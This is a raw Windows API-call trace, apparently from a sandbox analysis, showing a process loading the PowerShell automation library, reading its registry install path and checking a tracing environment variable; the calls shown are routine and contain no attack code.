	[0862.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda78 | out: phkResult=0x1cda78*=0x394) returned 0x0
	[0862.335] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9fc, lpData=0x0, lpcbData=0x1cd9f8*=0x0 | out: lpType=0x1cd9fc*=0x1, lpData=0x0, lpcbData=0x1cd9f8*=0x56) returned 0x0
	[0862.335] CoTaskMemAlloc (cb=0x5a) returned 0x1b8efdb0
	[0862.335] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9cc, lpData=0x1b8efdb0, lpcbData=0x1cd9c8*=0x56 | out: lpType=0x1cd9cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd9c8*=0x56) returned 0x0
	[0862.335] CoTaskMemFree (pv=0x1b8efdb0) 
	[0862.335] RegCloseKey (hKey=0x394) returned 0x0
	[0862.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.349] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0862.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.349] CoTaskMemFree (pv=0x2d4f30) 
	[0862.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.621] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.621] CoTaskMemFree (pv=0x2d4f30) 
	[0863.649] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.649] CoTaskMemFree (pv=0x2d4f30) 
	[0863.650] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.651] CoTaskMemFree (pv=0x2d4f30) 
	[0863.651] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.651] CoTaskMemFree (pv=0x2d4f30) 
	[0863.652] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.652] CoTaskMemFree (pv=0x2d4f30) 
	[0863.657] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.657] CoTaskMemFree (pv=0x2d4f30) 
	[0863.657] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0863.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.657] CoTaskMemFree (pv=0x2d4f30) 
	[0865.459] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0865.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.459] CoTaskMemFree (pv=0x2d4f30) 
	[0867.248] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2d5040
